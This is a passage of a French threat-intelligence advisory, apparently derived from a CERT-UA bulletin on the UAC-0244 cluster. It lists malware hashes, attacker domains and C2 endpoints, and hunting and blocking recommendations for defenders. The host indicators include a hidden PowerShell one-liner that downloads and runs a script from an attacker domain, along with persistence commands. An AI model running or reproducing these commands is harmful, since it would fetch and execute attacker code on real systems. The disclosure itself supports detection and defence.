f97b108840bd2d1d7d2471f5cdeff8fcc94d6730ed06d73305fc601213bb5861d378ef93402ffb169366c911b93329d3WUDFHost.ps1
9a21d4608050f0aae9d1c33dac020a6b8682cec191aa676d696d5ccc6a1116285cb912ae9685e3060fae2e45277a1603temy spivpratsi.zip
a03691e22003b2805757f2dee6482506d60dd96ef92b43e2e4f955dd76448fc320c3f8445b661d9a4a3c40caca0aa8a5Materialy_konferentsii_pdf.exe (PYINSTALLER)
880b10816e37fcd0a500675ce68a78a0562afa6497ef6970f5b94f86ff407315e6a5d7b752126ba976f74bf35df6ddc9captcha
4ef32f2835ae7f8f2930fa372615c6beec970e4b03d6f2b05641e875ffd7c91ef6e5b8250dd17544e35418acd5ef7caeSystemHealthSvc.ps1
0f1ce020bc7fe81f93e2e2cf0f86b3910c2e69b64794bec9a980491b08cbfe5a7f588b9c847f5add07a7374e8abc446bConfigurate.ps1
87660aaf18fee1ddf20fab3e1940887fc75c4da349b423357fb32dc315c8c4b4e6966d7d1e549e1539303fe80033581dmain (1).exe (PYINSTALLER)
e41f0ba1abf43a5f8f2aa9f86fd1b76d55677db95eb5ddcca47394d188610029f06101ee7d1d8e63d9444c9c5cb04ae1princess.apk (CAMELSPY)
842d96f208b567e58c5656017fb67df607d9deaace25d90fc91b31849dfc12b2fc3ac5ca90e317cfa165fe1d3553eeadprincess.apk (CAMELSPY)
504c9288c53ce8bb0398d1c79599ea2c715bcc04942b5e82714e5ceafe530bf1ac8e11f3b19771de122fe9dfaf9106f5Blank zaiavky rozminuvannia.rar
b3dffd4103ed2a6ef3e5163e633b493002436e213bf00d194ae45e71490722114f3d7d47ef5c03430cfa81b7366900c7Blank zaiavky.js
e124c741f7fc7232943a4308fbf706cfd9810fa6aa59864ceef509ed551da85fce31d69cfcd78f2f8b146c761387370emap.apk
eee62cb89759119d56f6d862af9cdfc7742b23f11491ee61f1f09da26726f8fc58785e889b3a0a4f45e7b6a1ba6adca0latest.apk
241d00e44f0be0f4145473f28784f2ec9dd6c5def9e5897e230e12966f21cd6148ced3b3903d78bdb88079b0f4c7e73dprincess.apk (CAMELSPY)
d2fbd455cf68f8f62d86a972bdd82fd65e6c5b6604d88f044bff53b6576f7b15046baa666fa72bafe62069a8b9e9452fPrincessClub.exe
55b0ed5b95401392a2f6bd36c238fb66dfbdd34d97d5284d4146b969dd86d2bcb3c2e9efb0815c10dc479099ed514f31amd.ps1 (SILENTLOOP)
310792ad29d89272aca22cf7d98b18babd3f35b91bf83427e953d4cf531a0ee4b5ec9fc76b91700274effe0eba22510fDokumentiv dlia zapovnennia.rar
b9be544b776d6bed422b2691272ae7852abb318455960b446d034967c8403ec4339ba248b946f02cb1307ed7e6f4e327Blank zaiavy.js
65008667a719cd51812aee9b35eb9bfa1e198a1c3b484fbe4d2f51841c5f4442878d465c4587046d9bca5bc3d2543e07maintenance.ps1

8.2 Indicateurs hôte (UAC-0244 historique)

%PROGRAMDATA%\Microsoft Windows\Configurate.ps1 %PROGRAMDATA%\Microsoft Windows\SystemHealthSvc.ps1 conhost.exe –headless « %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe » -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File « %PROGRAMDATA%\Microsoft Windows\SystemHealthSvc.ps1 » powershell.exe -NoProfile -ExecutionPolicy Bypass -File « %PROGRAMDARA%\Microsoft Windows\Configurate.ps1 » powershell.exe -w h -c « [PowerShell]::Create().AddScript((New-Object Net.WebClient).DownloadString(‘https://newstarcommunications.com/maintenance’)).Invoke() » Scheduled tasks : Microsoft System Health Service Scheduled Update

8.3 Indicateurs réseau (UAC-0244 historique)

Adresses email : it.integratov@gmail.com nat.mamchyr@gmail.com pavlocusmak@gmail.com tarasshveiko@gmail.com kanc.sm.dsms@gmail.com Domaines : serotoninenterprise.com highfleetenterprise.com doct0rsim.com routinesyscheckup.com princess-mens.click zoomconference.app zoomconference.click newstarcommunications.com princessclub.best heltaskeltahenterprise.com URLs : hXXps://highfleetenterprise.com/maintenance hXXps://serotoninenterprise.com/captcha hXXps://serotoninenterprise.com/watchdog hXXps://doct0rsim.com/captcha hXXps://doct0rsim.com/watchdog hXXps://routinesyscheckup.com/captcha hXXps://routinesyscheckup.com/watchdog hXXps://newstarcommunications.com/maintenance hXXps://princess-mens.click/K-Lite_Codec_Pack_1905_Basic.rar hXXps://princess-mens.click/princess.apk hXXps://princessclub.best/?kodek=princess2024 hXXps://princessclub.best/princess.apk hXXps://princessclub.best/princess.rar hXXps://heltaskeltahenterprise.com/maintenance hXXps://transfer.brothertec.eu/0ANucixP9C/Propozytsiia.zip hXXps://storage.vlasiuk.kiev.ua/SW90D0qhta/materialy_konferentsii.zip hXXp://share.secureinfo.eu/pUKghXPQu7/temy spivpratsi.zip hXXp://share.secureinfo.eu/ypMXMG58xH/Materialy_konferentsii_dop.zip C2 WebSocket : (wss)://serotoninenterprise.com:80 (wss)://doct0rsim.com:80 C2 HTTP / API : hXXp://91.149.221.187:5000/check_update?version=1.0 hXXp://91.149.221.187:5000/data hXXp://91.149.221.187:5000/download/apk hXXp://91.149.221.251:5000/upload hXXp://91.149.221.211:5000/check_update hXXp://91.149.221.211:5000/data hXXp://91.149.221.9:8000/api hXXp://91.149.221.9:8000/api/register hXXp://91.149.221.9:8000/api/commands?client_id= hXXp://91.149.221.9:8000/api/result hXXp://91.149.221.9:8000/api/status hXXp://91.149.221.9:8000/api/file/client.ps1 hXXp://91.149.221.9:8000/api/client/%client_id%/state hXXp://167.17.188.244:5000 hXXp://91.149.253.134:5000 hXXp://91.149.253.99:5000 Adresses IP : 109.107.171.216 193.38.235.33 109.107.171.185 194.87.148.90 193.233.23.81 167.17.188.244 (CAMELSPY C2) 91.149.253.134 (CAMELSPY C2) 91.149.253.99 (CAMELSPY C2) 91.149.221.187 (CAMELSPY C2) 91.149.221.251 (CAMELSPY C2) 138.124.65.106 74.112.102.120 91.149.221.211 91.149.221.9

9. Recommandations opérationnelles

  • Hunting prioritaire : recherche d’exécution de mshta.exe avec argument URL (hXXps://*.linkpc.net, hXXps://*.work.gd), powershell.exe avec -ep bypass sur scripts situés dans %APPDATA%\Adobe, %PROGRAMDATA%\AMD.
  • EDR / SIEM : intégration des hashs et chemins ci-dessus dans les règles de détection ; alerter sur la création de scheduled tasks dont la cible réside dans un répertoire utilisateur.
  • Réseau : blocage des domaines, IP et URLs publiés, en particulier les services de DNS dynamique (linkpc.net, work.gd, publicvm.com) et l’infrastructure d’OAST (oast.fun) lorsqu’elle n’est pas justifiée par un usage légitime de red team.
  • Sensibilisation : rappel ciblé auprès des agents administratifs et hospitaliers sur les leurres liés à l’aide humanitaire, aux convocations judiciaires et aux conférences professionnelles.
  • Chaîne logicielle FPV : toute mise à jour de l’application BACHU diffusée hors canal officiel doit être traitée comme suspecte par défaut.

10. Source

Bulletin officiel CERT-UA, mis à jour le 20.04.2026 :

https://cert.gov.ua/article/6288271

Article retraduit et mis en forme à partir du bulletin CERT-UA. Diffusion TLP:CLEAR. L’attribution finale du cluster UAC-0244 reste à la discrétion du CERT-UA.